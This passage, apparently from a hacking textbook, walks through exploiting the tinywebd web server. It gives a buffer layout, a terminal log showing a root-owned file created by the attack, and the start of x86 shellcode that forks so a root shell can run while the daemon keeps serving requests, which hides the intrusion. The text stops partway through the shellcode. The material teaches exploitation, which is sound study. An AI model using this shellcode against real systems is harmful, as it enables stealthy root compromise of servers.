Graphics Programs Reference
In-Depth Information
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (348 b)] [shellcode (53 b)] [ret addr (128 b)]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ ls -l /Hacked
-rw------- 1 root reader 0 2007-09-19 20:37 /Hacked
reader@hacking:~/booksrc $ ps aux | grep tinywebd
root 26787 0.0 0.0 1636 420 ? Ss 20:37 0:00 ./tinywebd
reader 26828 0.0 0.0 2880 748 pts/1 R+ 20:38 0:00 grep tinywebd
reader@hacking:~/booksrc $ ./webserver_id 127.0.0.1
The web server for 127.0.0.1 is Tiny webserver
reader@hacking:~/booksrc $
0x653
Child Laborers
Now that the difficult part is figured out, we can use this technique to silently
spawn a root shell. Since the shell is interactive, but we still want the process
to handle web requests, we need to fork to a child process. The fork() call
creates a child process that is an exact copy of the parent, except that it returns
0 in the child process and the new process ID in the parent process. We want
our shellcode to fork and the child process to serve up the root shell, while
the parent process restores tinywebd's execution. In the shellcode below,
several instructions are added to the start of loopback_shell.s. First, the fork
syscall is made, and the return value is put in the EAX register. The next few
instructions test to see if EAX is zero. If EAX is zero, we jump to child_process
to spawn the shell. Otherwise, we're in the parent process, so the shellcode
restores execution into tinywebd.
loopback_shell_restore.s
BITS 32
push BYTE 0x02 ; Fork is syscall #2
pop eax
int 0x80 ; After the fork, in child process eax == 0.
test eax, eax
jz child_process ; In child process spawns a shell.
; In the parent process, restore tinywebd.
lea ebp, [esp+0x68] ; Restore EBP.
push 0x08048fb7 ; Return address.
ret ; Return
child_process:
; s = socket(2, 1, 0)
push BYTE 0x66 ; Socketcall is syscall #102 (0x66)
pop eax
cdq ; Zero out edx for use as a null DWORD later.
xor ebx, ebx ; ebx is the type of socketcall.
inc ebx ; 1 = SYS_SOCKET = socket()
Search WWH ::




Custom Search